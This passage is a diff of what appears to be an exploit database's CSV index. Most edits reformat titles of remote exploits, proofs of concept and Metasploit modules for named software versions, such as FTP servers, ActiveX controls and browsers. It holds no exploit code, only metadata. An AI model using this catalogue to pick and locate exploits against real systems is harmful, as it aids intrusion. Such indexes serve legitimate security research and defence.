Execution",2009-02-09,ikki,hardware,remote,0 8037,platforms/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",windows,remote,0 -8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0 +8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)",2009-02-20,webDEViL,windows,remote,0 @@ -10478,19 +10480,19 @@ id,file,description,date,author,platform,type,port 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 -8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0 +8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser 'defer' Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0 8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - 'takescreenshot' Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8340,platforms/windows/remote/8340.py,"XBMC 8.10 - get tag from file name Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 +8340,platforms/windows/remote/8340.py,"XBMC 8.10 - Get Tag From File Name Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8363,platforms/windows/remote/8363.py,"XBMC 8.10 - 'HEAD' Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 8384,platforms/linux/remote/8384.txt,"net2ftp 0.97 - Cross-Site Scripting / Request Forgery",2009-04-09,cicatriz,linux,remote,0 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-Server - Directory Traversal",2009-04-10,DSecRG,windows,remote,0 -8398,platforms/windows/remote/8398.php,"FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 +8398,platforms/windows/remote/8398.php,"FTPDMIN 0.96 (Windows XP SP3) - 'RNFR' Remote Buffer Overflow",2009-04-13,surfista,windows,remote,21 8419,platforms/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure",2009-04-13,Stack,windows,remote,21 8421,platforms/windows/remote/8421.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 8422,platforms/windows/remote/8422.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 @@ -10530,7 +10532,7 @@ id,file,description,date,author,platform,type,port 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,windows,remote,2242 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,windows,remote,0 8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - 'SonicMediaPlayer.dll' Remote Buffer Overflow",2009-05-29,snakespc,windows,remote,0 -8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow (heap spray)",2009-06-01,His0k4,windows,remote,0 +8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow HeapSpray",2009-06-01,His0k4,windows,remote,0 8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,remote,0 8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 @@ -10547,9 +10549,9 @@ id,file,description,date,author,platform,type,port 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810 9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)",2009-06-29,His0k4,windows,remote,19810 -9039,platforms/multiple/remote/9039.txt,"cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 +9039,platforms/multiple/remote/9039.txt,"cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 -9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 +9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9093,platforms/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - .JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0 @@ -10558,14 +10560,14 @@ id,file,description,date,author,platform,type,port 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Local/Remote Multiple Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 -9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 +9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 -9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2)",2009-07-20,netsoul,windows,remote,0 -9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 +9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)",2009-07-20,netsoul,windows,remote,0 +9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 9303,platforms/windows/remote/9303.c,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",windows,remote,0 -9318,platforms/windows/remote/9318.py,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow (Universal)",2009-07-31,His0k4,windows,remote,0 +9318,platforms/windows/remote/9318.py,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow",2009-07-31,His0k4,windows,remote,0 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow",2009-08-01,Bruk0ut,windows,remote,30000 9330,platforms/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote,0 @@ -10696,7 +10698,7 @@ id,file,description,date,author,platform,type,port 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow",2009-10-07,blake,windows,remote,1235 -10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 - nfx file integer Overflow",2009-10-05,bruiser,windows,remote,0 +10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 - '.nfx' File Integer Overflow",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass",2009-11-10,"Dan Kaminsky",multiple,remote,0 10079,platforms/windows/remote/10079.txt,"Google Apps - mailto URI handler cross-browser Remote command Execution",2009-10-01,pyrokinesis,windows,remote,0 33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 @@ -10743,7 +10745,7 @@ id,file,description,date,author,platform,type,port 11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - Buffer Overflow",2010-01-18,"John Babio",windows,remote,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 -11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray)",2010-01-20,Dz_attacker,windows,remote,0 +11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Heap Spray Exploit",2010-01-20,Dz_attacker,windows,remote,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat Server - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-21,fb1h2s,windows,remote,0 11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - Remote Buffer Overflow (SEH)",2010-01-22,loneferret,windows,remote,0 11257,platforms/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Buffer Overflow (Metasploit)",2010-01-25,Trancer,windows,remote,0 @@ -10752,7 +10754,7 @@ id,file,description,date,author,platform,type,port 11328,platforms/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit",2010-02-12,Lincoln,windows,remote,0 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0 -11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)",2010-02-15,"Nullthreat & Pure|Hate",windows,remote,0 +11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",windows,remote,0 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 11468,platforms/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)",2010-02-15,dookie,windows,remote,21 11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 @@ -10792,9 +10794,9 @@ id,file,description,date,author,platform,type,port 12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,windows,remote,0 -12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 +12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetFileClose' Universal Exploit",2010-04-15,dookie,windows,remote,0 +12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetConnectionEnum' Universal Exploit",2010-04-15,dookie,windows,remote,0 +12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal Exploit",2010-04-15,dookie,windows,remote,0 12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - Remote Execution (via SQL Execution) (PoC)",2010-04-16,"Lucas Apa",multiple,remote,0 12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - Admin Creator (PoC)",2010-04-16,"Lucas Apa",multiple,remote,0 12265,platforms/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote,0 @@ -10880,20 +10882,20 @@ id,file,description,date,author,platform,type,port 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0 14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow (SEH)",2010-07-30,loneferret,windows,remote,0 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,windows,remote,0 -14519,platforms/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote,0 +14519,platforms/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray Exploit (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - 'DeleteFile Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - 'EnumFiles Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - 'FileExists Method' ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 -14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray",2010-08-08,"ThE g0bL!N",windows,remote,0 +14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray",2010-08-08,"ThE g0bL!N",windows,remote,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - 'FileExists' ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit",2010-08-10,sud0,windows,remote,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote,0 -14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 -14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 +14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray",2010-08-10,Madjix,windows,remote,0 +14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow",2010-08-10,"Rabih Mohsen",windows,remote,0 14623,platforms/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",windows,remote,21 14658,platforms/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0 @@ -10931,7 +10933,7 @@ id,file,description,date,author,platform,type,port 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 15265,platforms/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",windows,remote,0 -15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 +15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 15292,platforms/windows/remote/15292.rb,"Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - 'rcsL chunk' Memory Corruption",2010-10-21,Abysssec,windows,remote,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 @@ -10987,7 +10989,7 @@ id,file,description,date,author,platform,type,port 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 -15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 +15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Exploit (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Exploit",2011-01-19,Dr_IDE,windows,remote,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",windows,remote,0 @@ -11000,7 +11002,7 @@ id,file,description,date,author,platform,type,port 16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - 'http_response' Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0 16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",hardware,remote,0 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - 'PASV' Buffer Overflow Exploit",2011-02-03,modpr0be,windows,remote,0 -16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 +16103,platforms/multiple/remote/16103.txt,"Majordomo2 - 'SMTP/HTTP' Directory Traversal",2011-02-03,"Michael Brooks",multiple,remote,0 16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,windows,remote,0 16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote,0 @@ -11354,8 +11356,8 @@ id,file,description,date,author,platform,type,port 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16699,platforms/windows/remote/16699.rb,"Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16700,platforms/windows/remote/16700.rb,"Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16699,platforms/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16700,platforms/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16703,platforms/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 @@ -11407,7 +11409,7 @@ id,file,description,date,author,platform,type,port 16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 -16752,platforms/windows/remote/16752.rb,"Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 +16752,platforms/windows/remote/16752.rb,"Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"MiniShare 1.4.1 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16755,platforms/windows/remote/16755.rb,"Novell iManager - 'getMultiPartParameters' Arbitrary File Upload (Metasploit)",2010-10-19,Metasploit,windows,remote,8080 @@ -11578,7 +11580,7 @@ id,file,description,date,author,platform,type,port 17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote,0 17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",multiple,remote,0 -17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 +17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution",2011-03-30,ikki,multiple,remote,0 17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,windows,remote,0 17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,windows,remote,0 17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 @@ -11606,7 +11608,7 @@ id,file,description,date,author,platform,type,port 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)",2011-05-29,fdiskyou,windows,remote,0 17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)",2011-05-28,fdiskyou,windows,remote,0 -17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0 +17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)",2011-05-30,Metasploit,windows,remote,0 17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 @@ -11734,8 +11736,8 @@ id,file,description,date,author,platform,type,port 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit 